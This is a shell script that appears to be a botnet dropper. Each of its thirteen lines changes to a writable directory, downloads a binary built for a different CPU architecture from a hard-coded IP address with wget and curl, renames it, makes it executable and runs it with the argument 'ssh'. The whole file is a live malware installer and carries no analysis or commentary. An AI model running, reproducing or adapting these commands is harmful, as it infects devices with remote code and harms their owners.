#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.210.20.190/bins/x86; curl -O http://31.210.20.190/bins/x86; cat x86 > 76d32be0; chmod +x *; ./76d32be0 ssh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.210.20.190/bins/mips; curl -O http://31.210.20.190/bins/mips; cat mips > 76d32be0; chmod +x *; ./76d32be0 ssh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.210.20.190/bins/mpsl; curl -O http://31.210.20.190/bins/mpsl; cat mpsl > 76d32be0; chmod +x *; ./76d32be0 ssh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.210.20.190/bins/arm; curl -O http://31.210.20.190/bins/arm; cat arm > 76d32be0; chmod +x *; ./76d32be0 ssh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.210.20.190/bins/arm5; curl -O http://31.210.20.190/bins/arm5; cat arm5 > 76d32be0; chmod +x *; ./76d32be0 ssh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.210.20.190/bins/arm6; curl -O http://31.210.20.190/bins/arm6; cat arm6 > 76d32be0; chmod +x *; ./76d32be0 ssh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.210.20.190/bins/arm7; curl -O http://31.210.20.190/bins/arm7; cat arm7 > 76d32be0; chmod +x *; ./76d32be0 ssh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.210.20.190/bins/ppc; curl -O http://31.210.20.190/bins/ppc; cat ppc > 76d32be0; chmod +x *; ./76d32be0 ssh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.210.20.190/bins/m68k; curl -O http://31.210.20.190/bins/m68k; cat m68k > 76d32be0; chmod +x *; ./76d32be0 ssh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.210.20.190/bins/spc; curl -O http://31.210.20.190/bins/spc; cat spc > 76d32be0; chmod +x *; ./76d32be0 ssh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.210.20.190/bins/i686; curl -O http://31.210.20.190/bins/i686; cat i686 > 76d32be0; chmod +x *; ./76d32be0 ssh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.210.20.190/bins/sh4; curl -O http://31.210.20.190/bins/sh4; cat sh4 > 76d32be0; chmod +x *; ./76d32be0 ssh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.210.20.190/bins/arc; curl -O http://31.210.20.190/bins/arc; cat arc > 76d32be0; chmod +x *; ./76d32be0 ssh